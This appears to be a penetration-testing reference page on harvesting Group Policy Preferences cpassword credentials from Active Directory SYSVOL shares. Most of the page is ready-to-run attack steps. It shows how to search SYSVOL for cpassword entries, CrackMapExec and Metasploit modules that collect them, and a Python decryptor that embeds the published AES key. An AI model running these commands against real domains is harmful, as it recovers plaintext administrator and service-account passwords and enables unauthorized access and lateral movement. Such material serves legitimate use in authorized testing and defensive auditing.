Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Group Policy Preferences (GPP) stored credentials in cpassword field in XML files on SYSVOL. AES key was published by Microsoft → any domain user can decrypt.

Find GPP Files

Manual

smbclient //DC_IP/SYSVOL -U 'user%password'

find /mnt/sysvol -name "*.xml" -exec grep -l "cpassword" {} \;
Look in:
  • Groups.xml — local admin passwords
  • Services.xml — service account passwords
  • Scheduledtasks.xml — scheduled task credentials
  • DataSources.xml — database credentials
  • Drives.xml — mapped drive credentials
  • Printers.xml — printer credentials

CrackMapExec

crackmapexec smb DC_IP -u user -p password -M gpp_password

Metasploit

use auxiliary/scanner/smb/smb_enum_gpp
set RHOSTS DC_IP
set SMBUser user
set SMBPass password
run

Decrypt cpassword

gpp-decrypt

gpp-decrypt "ENCRYPTED_CPASSWORD"

Python

import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

key = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
iv = b'\x00' * 16
enc = base64.b64decode("CPASSWORD_HERE")
cipher = AES.new(key, AES.MODE_CBC, iv)
print(unpad(cipher.decrypt(enc), AES.block_size).decode('utf-16-le'))

Get-GPPPassword (PowerSploit)

Import-Module .\Get-GPPPassword.ps1
Get-GPPPassword

Notes

  • MS14-025 patched creation of new GPP passwords (2014)
  • Existing GPP passwords NOT removed by patch
  • Old domains often still have them in SYSVOL
  • Any authenticated domain user can read SYSVOL

Quick Reference

TaskCommand
CMEcrackmapexec smb DC -u user -p pass -M gpp_password
Decryptgpp-decrypt "cpassword"
ManualSearch SYSVOL for *.xml with cpassword
PowerSploitGet-GPPPassword